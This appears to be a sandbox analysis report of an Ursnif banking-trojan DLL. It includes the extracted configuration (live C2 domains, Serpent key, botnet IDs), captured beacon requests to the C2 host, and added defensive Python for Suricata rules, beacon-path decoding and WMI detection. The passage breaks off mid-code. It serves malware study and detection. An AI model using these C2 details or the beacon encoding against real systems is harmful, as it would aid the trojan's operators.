Windows Analysis Report 3b17.dll

Overview

General Information

Sample Name: 3b17.dll
Analysis ID: 444315
MD5: 3b17fcc55cee8cbe4cd1b443f358c36d
SHA1: 45d1e652f282a94b37ac32afb62ff563afb2fb39
SHA256: 9ae13bdb906bf774982242a378a20fb25da3e29dd7b5e1acd2531562319edba6
Tags: dll, gozi

Detection

Threat name: Ursnif
Score: 80 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4876 cmdline: loaddll32.exe 'C:\Users\user\Desktop\3b17.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 3868 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4576 cmdline: rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 244 cmdline: rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5928 cmdline: rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3012 cmdline: rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5912 cmdline: rundll32.exe C:\Users\user\Desktop\3b17.dll,Time MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 3472 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4792 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 2996 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{
  "lang_id": "RU, CN",
  "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=",
  "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"],
  "botnet": "6000",
  "server": "580",
  "serpent_key": "PNJeXnLTijShJqmR",
  "sleep_time": "10",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "10"
}

Reading the fields: c2_domain lists the two C2 hosts configured into this build (only gtr.antoinfer.com was resolved and contacted during this run, see Networking below); serpent_key is the 16-character (128-bit) Serpent key that protects the C2 traffic; botnet and server identify the campaign and C2 server on the operator side; lang_id is the locale list the loader compares the system language against before it runs (the locale query shows up in the signatures above). The RSA key is the operator's public key: it decrypts nothing on the analyst's side, but it is a stable fingerprint of the operator's key pair and worth pivoting on.
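The configuration above is what a responder turns into blocking and detection. The Python below is an added example (not Joe Security's code and nothing taken from the sample): it parses the config fields as listed, validates each C2 hostname before it is interpolated into rule text, sanity-checks the Serpent key size, and emits Suricata rules (5+ sticky-buffer syntax) for the HTTP Host header and for the DNS lookup of each C2 host. The SID range, the rule message text and the omission of the RSA key from the parsed input are this example's own choices.

```python
import json
import re

# Fields copied from the extracted configuration above. The RSA public key is
# left out: it is the operator's public key and plays no part in network detection.
REPORT_CONFIG_JSON = """
{"lang_id": "RU, CN",
 "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"],
 "botnet": "6000", "server": "580",
 "serpent_key": "PNJeXnLTijShJqmR",
 "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
"""

# Strict hostname shape (lower-case labels, at least one dot). A C2 value is
# attacker-controlled data: without this check a value such as 'x; sid:1' would
# be pasted straight into generated rule text.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+$"
)


def load_config(text: str) -> dict:
    """Parse the extractor's JSON and normalise/validate the C2 host list."""
    cfg = json.loads(text)
    hosts = []
    for host in cfg.get("c2_domain", []):
        host = host.strip().lower().rstrip(".")
        if not HOSTNAME.match(host):
            raise ValueError(f"refusing to build rules from c2_domain value {host!r}")
        hosts.append(host)
    cfg["c2_domain"] = hosts
    return cfg


def serpent_key_bits(key: str) -> int:
    """ISFB stores the Serpent key as printable text; Serpent accepts only
    128-, 192- or 256-bit keys, so any other length means a misparsed config."""
    bits = len(key.encode("ascii")) * 8
    if bits not in (128, 192, 256):
        raise ValueError(f"serpent_key is {bits} bits, not a Serpent key size")
    return bits


def suricata_rules(cfg: dict, base_sid: int = 9000001) -> list:
    """Two rules per C2 host in Suricata 5+ sticky-buffer syntax: the HTTP Host
    header of the beacon (this run used plain HTTP on port 80) and the DNS
    lookup that precedes it. SIDs in the local 9,000,000 range are an assumption."""
    rules, sid = [], base_sid
    tag = f"LOCAL Ursnif botnet {cfg['botnet']} server {cfg['server']}"
    for host in cfg["c2_domain"]:
        rules.append(
            "alert http $HOME_NET any -> $EXTERNAL_NET any "
            f'(msg:"{tag} C2 HTTP beacon to {host}"; flow:established,to_server; '
            f'http.host; content:"{host}"; bsize:{len(host)}; '
            f"classtype:trojan-activity; sid:{sid}; rev:1;)"
        )
        rules.append(
            "alert dns $HOME_NET any -> any any "
            f'(msg:"{tag} C2 DNS lookup {host}"; dns.query; content:"{host}"; '
            f"nocase; endswith; classtype:trojan-activity; sid:{sid + 1}; rev:1;)"
        )
        sid += 2
    return rules


if __name__ == "__main__":
    config = load_config(REPORT_CONFIG_JSON)
    print(f"serpent key: {serpent_key_bits(config['serpent_key'])} bits")
    print("\n".join(suricata_rules(config)))
```

The bsize check on the HTTP rule pins the exact host so that a longer look-alike does not match; the DNS rule uses endswith instead, so subdomains of a C2 host are caught as well.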

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(17 further memory-dump matches on the same rule; the complete list of 22 appears under "Yara detected Ursnif" in the signature section below)

Unpacked PEs

Source | Rule | Description | Author
3.2.rundll32.exe.54194a0.4.raw.unpack | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.54194a0.2.raw.unpack | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
0.2.loaddll32.exe.30194a0.2.raw.unpack | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000003.286056842.0000000000800000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif (the configuration listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 3b17.dll | Metadefender: Detection: 22%
Source: 3b17.dll | ReversingLabs: Detection: 55%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E839C5 CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam, memcpy, CryptEncrypt, CryptDecrypt, GetLastError, GetLastError, CryptDestroyKey, GetLastError, CryptReleaseContext, GetLastError
Source: 3b17.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: 3b17.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: 3b17.dll | Binary string (PDB path): c:\418\521\Condition\lake\Free_yet\Sky.pdb

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49721 -> 165.232.183.49:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49721 -> 165.232.183.49:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49723 -> 165.232.183.49:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49728 -> 165.232.183.49:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49728 -> 165.232.183.49:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 165.232.183.49:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 165.232.183.49:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49734 -> 165.232.183.49:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49736 -> 165.232.183.49:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49736 -> 165.232.183.49:80
All ten alerts are on plain-HTTP connections from the sandbox host (192.168.2.3) to 165.232.183.49:80; the two ET rules key on the _2B and _2F escapes in the request path, and the requests below carry Host: gtr.antoinfer.com, the only name resolved during the run.
Source: Joe Sandbox View | ASN Name: ALLEGHENYHEALTHNETWORKUS
Source: global traffic | HTTP traffic detected:
    GET /TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6b9FMvL_2FIqp4S/ewVNte36FW/XPExsAA8VeJEhvgVb/KCeGwDykzB_2/FfJMiTYYFkB/UqSvKjZpB_2FYe/tRxQkg5XCh4uQfiEclNaO/UTPObDJYz_2FyBjB/v_2F2pSU4VWX5Hz/N9QtHdwYZ4WUrzEx5D/Q3nFD_2F2/8Ujs0VBDGr49KJ6AsZSH/EgfscPlAK393eCGdmmF/FMztWz0QhrOgK4MYRsuNHe/_2BkNcUEELtfv/x0cjHdMa17k7/_2FjZKD HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_2FuI_2FqZ2s_2FiaO0J_/2FTRLU31mRGflU2b/ZIJ0FncJBL1ujMu/UAyv0uh4NdsHQb_2Fp/7IlErLThx/qx9lbHRBIr_2BN2fcH7p/3MZS8xBk2HV8HO_2FwY/sjaecD1Ad9d4_2Bhfj7Udw/txqy4ndWQ8c2I/i_2FDCoi/J8FwQUA7HNUWWZ74vTmq4PN/8fRY05oVkC/eLBfQLcjbzJ0zm8P9/lrnxZ8213Jiq/fQMuhQcrOSv/_2FzhSntnuW3P7/C3J8_2BPrwDMXrvKewIwt/CP9ILXpGj47Z_2/F HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /LQ0ImNchzaabH7Vdh_/2FtRScd2v/QQzFkXdgAhow_2FcWrEP/n3sYFzsTbYVS3adrQdv/5Nzc_2BoRJpkAsHtAz6xV3/PsE8tlG0HHtLJ/T5TqRkda/BLQo9v_2FZTJ_2FPNHoYsv1/ye7M3znq3j/msHJ000mSBJHPb7nZ/E46dHTxH_2B4/eeBIrQKxL9Y/THDXKoks2pteky/rz_2F_2F0HzAFdHANfOc3/VtFiNo945_2BUObZ/oZuZG5t2mblYFyG/ygnFakJ2W33SNUuycB/j7wv4YZIa/0Hblow_2BZFOik2zX2YB/PXGpfOrjekSAdA19ARh/ahTrlQtp6MFSLYtpjwx_2B/D_2FHvRt HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /s96BBj_2BW0E7I/inPV3RC1ndWtP3TCiXWoq/7JGd2eicozVaSDqP/TIPKarKtLPkYLRx/VCo8CEXU6VSxFW20ap/EmssX5YuH/_2FmT3PaMcthev94lCLF/bWDeiN4zbJE6pfv8oTi/Qb34wmcConjidXNcLSenBo/rqyTVIe8oNi_2/FtqR6e_2/BJ_2F_2Ff8F8rmDwirrIz3L/Nk4szxk3_2/FsoXecNAHbdXzRM5b/qnqXpzn3ytbn/lcXf0S9I54h/nPX849yJE9mtRH/Mg8GQncb8LaArkE96Imgo/T60bsdjLtZH_2FnO/zpiezRZpQAYC8v0/MRTN6xcxZf9LqzW6jmrO/pZ HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /J7P_2BuFqD/6ho97HFr4RP0mXM5H/ZrJ1_2BByY5Q/ab42fK_2F4S/vR5_2FWZ9gdHVf/hFgLjlRclm4jOH5T1Dh_2/Bb6OfmnpAwg0WKei/TGgUW067tNixzOx/BwPRLezaId9OtwPQlY/CkLoMrcdP/aOG78DSC7_2BjhPI9iFK/iN8ZMV2kpmYpR22nO5N/DPr4nIGLY40kIrg97zu5zK/lZpfj5ONzqtKf/Vl33ZktQ/u9goArPbUAC5CGM3eIqnvuS/s_2BLl3UAj/4ev_2F316DIi43v_2/FeCwH6Boab2B/JVucmKuDRDu/1ldPV7QmrKfn1O/3tEgr34mvlOov5etr8LcR/vS5_2Fy HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: gtr.antoinfer.com
Source: global traffic | HTTP traffic detected (server response; the chunked body is one 0x6a-byte chunk holding a gzip stream, magic 1f 8b 08, followed by the terminating zero-length chunk):
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Mon, 05 Jul 2021 14:53:11 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Content-Encoding: gzip
    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp | String found in binary or memory: http://gtr.antoinfer.com/IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_
Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmp | String found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC
Source: ~DFF4A7B0CDF51E1130.TMP.24.dr, {2403265A-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr | String found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6
Source: rundll32.exe, 00000003.00000002.471774654.000000000087B000.00000004.00000020.sdmp, {24032658-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr, ~DFDEC152A471305B20.TMP.24.dr | String found in binary or memory: http://gtr.antoinfer.com/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/B
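The _2B and _2F escapes the ET signatures key on are, together with the '/' separators scattered through the path, a transport encoding laid over base64: the captured first beacon even shows a separator landing inside an escape ('hvJk_' + '/2BaPz'), so a decoder has to strip separators before it restores escapes. The Python below is an added example (not part of the report and not the loader's own code): it normalizes a captured path back to base64 and recovers the raw bytes, which are still ciphertext (the config's serpent_key is the key; Serpent itself is not implemented here). The encoder exists only to build a round-trip test vector; its segment length, and the assumption that base64 padding is simply dropped on the wire, are this example's assumptions.

```python
import base64
import re
from typing import Optional

# Request path of the first beacon captured above (Host: gtr.antoinfer.com).
REPORT_URI = (
    "/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/"
    "BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/"
    "7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/"
    "g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/"
    "ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO"
)

B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+$")
SERPENT_BLOCK = 16  # Serpent block size; the config's serpent_key names the cipher


def normalize_ursnif_path(path: str) -> str:
    """Undo the transport encoding and return unpadded base64.

    Separators go first: the captured path has a '/' inside an escape
    ('...hvJk_' + '/2BaPz...'), so restoring _2B/_2F segment by segment would
    miss that escape. Base64 never contains '_', so the two replacements
    cannot interfere with each other.
    """
    joined = path.strip("/").replace("/", "")
    return joined.replace("_2B", "+").replace("_2F", "/")


def decode_ursnif_path(path: str) -> Optional[bytes]:
    """Raw bytes carried by a beacon path (still Serpent ciphertext), or None
    when the path is not a well-formed beacon. Padding is assumed to have been
    dropped on the wire and is restored here; a length of 1 mod 4 can never be
    valid base64, padded or not."""
    b64 = normalize_ursnif_path(path)
    if not B64_ALPHABET.match(b64) or len(b64) % 4 == 1:
        return None
    padded = b64 + "=" * (-len(b64) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return None


def encode_ursnif_path(blob: bytes, chunk: int = 7) -> str:
    """Inverse transform, used to build test vectors with the captured
    structure. The loader's real segment length is not known from the report;
    7 is chosen so that segment boundaries cut through escapes."""
    b64 = base64.b64encode(blob).decode("ascii").rstrip("=")
    escaped = b64.replace("+", "_2B").replace("/", "_2F")
    return "/" + "/".join(escaped[i:i + chunk] for i in range(0, len(escaped), chunk))


def beacon_summary(path: str) -> dict:
    """Triage view of one request: did it decode, how many cipher bytes it
    carried, and whether that is a whole number of Serpent blocks (a remainder
    would mean something other than block ciphertext is appended)."""
    raw = decode_ursnif_path(path)
    if raw is None:
        return {"decoded": False, "cipher_bytes": 0, "whole_blocks": False}
    return {"decoded": True, "cipher_bytes": len(raw),
            "whole_blocks": len(raw) % SERPENT_BLOCK == 0}


# Constructed test vector (not sandbox data): 32 bytes whose base64 form
# contains both '+' and '/', so both escapes are exercised.
SAMPLE_BLOB = b"\xfb\xff\xbf" * 8 + bytes(8)

if __name__ == "__main__":
    print(beacon_summary(REPORT_URI))
    print(encode_ursnif_path(SAMPLE_BLOB))
    print(beacon_summary(encode_ursnif_path(SAMPLE_BLOB)))
```

Decrypting the recovered bytes is the next step and needs a Serpent implementation plus the config's serpent_key; what this example settles is the part the IDS signatures see, namely that the path is base64 under a fixed escape scheme and not random filler.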

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | the same 25 file sources as listed under "Key, Mouse, Clipboard, Microphone and Screen Capturing" above (3 unpacked PEs, 20 memory dumps, 2 process memory spaces)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E839C5 CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam, memcpy, CryptEncrypt, CryptDecrypt, GetLastError, GetLastError, CryptDestroyKey, GetLastError, CryptReleaseContext, GetLastError

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
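Both loaddll32.exe and rundll32.exe reach the registry through IWbemServices::ExecMethod on StdRegProv instead of calling the registry API themselves. The consequence for detection: the write is carried out by the WMI provider host (wmiprvse.exe) on the caller's behalf, so registry telemetry that records the writing image attributes it to wmiprvse.exe rather than to the malware, and the WMI method call, with its client image, is the event to alert on. The Python below is an added example (not from the report) of that logic run over records constructed from the ExecMethod lines above; the record field names and the set of images expected to use StdRegProv are this example's own assumptions.

```python
from collections import Counter

# StdRegProv methods that modify the registry. Reads (GetStringValue, EnumKey,
# EnumValues, ...) are deliberately excluded: the sample issues GetStringValue
# as well, and alerting on every WMI registry read would be pure noise.
STDREGPROV_WRITE_METHODS = frozenset({
    "CreateKey", "DeleteKey", "DeleteValue",
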